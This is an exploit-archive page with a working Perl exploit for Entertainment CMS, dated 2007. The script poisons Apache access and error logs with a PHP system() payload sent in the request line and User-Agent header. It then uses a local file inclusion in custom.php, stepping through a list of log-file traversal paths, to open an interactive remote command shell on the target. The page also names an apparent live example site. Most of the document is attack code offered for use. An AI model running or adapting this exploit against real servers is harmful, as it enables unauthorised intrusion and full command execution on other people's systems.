[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Entertainment CMS (Local Inclusion) Remote Command Execution Exploit
# Published : 2007-07-24
# Author : Kw3[R]Ln
# Previous Title : Confixx Pro <= 3.3.1 (saveserver.php) Remote File Inclusion Vulnerability
# Next Title : Micro CMS 3.5 (revert-content.php) Remote SQL Injection Vulnerability
#!/usr/bin/perl
#
# Entertainment CMS Remote Command Execution Exploit
# Download: http://rapidshare.com/files/39640099/enter-cms.rar
#
# Exploit: http://site.com/[path]/custom.php?pagename=[Local File Inclusion];
# Example: http://multimedia.mydlstore.net/custom.php?pagename=teeeeeeeeeeee
#
# RST WAS MOVED TO RSTZONE.ORG !
#
# Another bug: Entertainment CMS Admin Login Bypass => http://securityreason.com/securityalert/2878
#
# Coded by Kw3rLn from Romanian Security Team a.K.A http://RSTZONE.ORG
# Contact: office@rstzone.org
#
use IO::Socket;
use LWP::Simple;
#ripped from rgod
@apache=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);
print "[RST] Entertainment CMS Remote Command Execution Exploitn";
print "[RST] need magic_quotes_gpc = offn";
print "[RST] c0ded by Kw3rLn from Romanian Security Team [ http://rstzone.org ] nn";
if (@ARGV < 3)
{
print "[RST] Usage: xploit.pl [host] [path] [apache_path]nn";
print "[RST] Apache Path: n";
$i = 0;
while($apache[$i])
{ print "[$i] $apache[$i]n";$i++;}
exit();
}
$host=$ARGV[0];
$path=$ARGV[1];
$apachepath=$ARGV[2];
print "[RST] Injecting some code in log files...n";
$CODE="<?php ob_clean();system($HTTP_COOKIE_VARS[cmd]);die;?>";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "[RST] Could not connect to host.nn";
print $socket "GET ".$path.$CODE." HTTP/1.1rn";
print $socket "User-Agent: ".$CODE."rn";
print $socket "Host: ".$host."rn";
print $socket "Connection: closernrn";
close($socket);
print "[RST] Shell!! write q to exit !n";
print "[RST] IF not working try another apache pathnn";
print "[shell] ";$cmd = <STDIN>;
while($cmd !~ "q") {
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "[RST] Could not connect to host.nn";
print $socket "GET ".$path."custom.php?pagename=".$apache[$apachepath]."%00&cmd=$cmd HTTP/1.1rn";
print $socket "Host: ".$host."rn";
print $socket "Accept: */*rn";
print $socket "Connection: closernn";
while ($raspuns = <$socket>)
{
print $raspuns;
}
print "[shell] ";
$cmd = <STDIN>;
}
# www.Syue.com [2007-07-24]